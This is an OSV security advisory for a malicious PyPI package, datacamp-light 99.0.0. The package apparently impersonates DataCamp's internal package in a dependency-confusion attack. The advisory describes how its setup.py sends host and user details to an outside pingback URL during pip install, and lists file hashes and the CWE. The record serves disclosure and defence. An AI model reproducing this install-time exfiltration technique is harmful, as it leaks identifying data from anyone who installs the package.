MAL-2026-5868
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/datacamp-light/MAL-2026-5868.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5868
- Published
- 2026-06-16T07:37:14Z
- Modified
- 2026-06-16T16:16:48.805432619Z
- Summary
- Malicious code in datacamp-light (PyPI)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (234a0d37873455b7db32068745d93ed29aafa596877b39949280b4ec0621ad6b)
datacamp-light 99.0.0 impersonates DataCamp's internal package (name='datacamp-light', author='DataCamp', url='https://github.com/datacamp/datacamp-light', anomalous version 99.0.0 — the canonical dependency-confusion bait shape). setup.py defines an exfiltrate() function and invokes it unconditionally at top level, so it fires during
pip install. The function collects hostname, current working directory, platform, Python version, and USER/USERNAME environment variables, JSON-encodes them, and POSTs them via urllib.request.urlopen to https://z39gspa3.pingback.sh/c. Any installer whose resolver picks up this public artifact (the intent of the 99.0.0 version pin) leaks host and user identifiers to the pingback domain. Even though the package self-labels as a 'PoC,' the published artifact actively phones home from any machine that installs it.Source: kam193 (932d64d5c0af79e8508b244379f54edc48fea625d9becd455912980e30dd146e)
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
The package overrides the install command in setup.py to execute malicious code during installation.
- Database specific
{ "malicious-packages-origins": [ { "id": "pypi/GENERIC-standard-pypi-install-pentest/datacamp-light", "import_time": "2026-06-16T08:06:34.14051001Z", "versions": [ "99.0.0" ], "source": "kam193", "modified_time": "2026-06-16T07:37:14.136625Z", "sha256": "932d64d5c0af79e8508b244379f54edc48fea625d9becd455912980e30dd146e" }, { "id": "IN-MAL-2026-006751", "import_time": "2026-06-16T16:06:32.945994809Z", "versions": [ "99.0.0" ], "source": "amazon-inspector", "sha256": "234a0d37873455b7db32068745d93ed29aafa596877b39949280b4ec0621ad6b", "modified_time": "2026-06-16T14:38:27Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- Kamil Mańkowski (kam193) - REPORTER
-
Affected packages
PyPI / datacamp-light
Package
- Name
- datacamp-light
- View open source insights on deps.dev
- Purl
- pkg:pypi/datacamp-light
Database specific
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/datacamp-light/MAL-2026-5868.json"
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
indicators
{
"package_integrity": [
{
"filename": "datacamp_light-99.0.0.tar.gz",
"hashes": {
"blake2b_256": "741bb9dbeb0d166a742444b0a6cd86f13916b067dc3466dc47655f728c40df54",
"md5": "7d47fe8877ca21e55e07c90059d77d29",
"sha256": "7491fa48ad8c21f25e1dbb6c199f2fdc806c0f630c311a2e04e0125b014e1ca3"
}
}
],
"evidence_files": [
{
"path": "setup.py",
"sha256": "4285235740ca60c014f0d9033e31dffcb4eda8e73eaaceff33b6a6e772920db3",
"tlsh": "f2214156d8216c63274664a48c1b51253727f6072e02f8ac3e8c82581fae2be03b4358"
}
]
}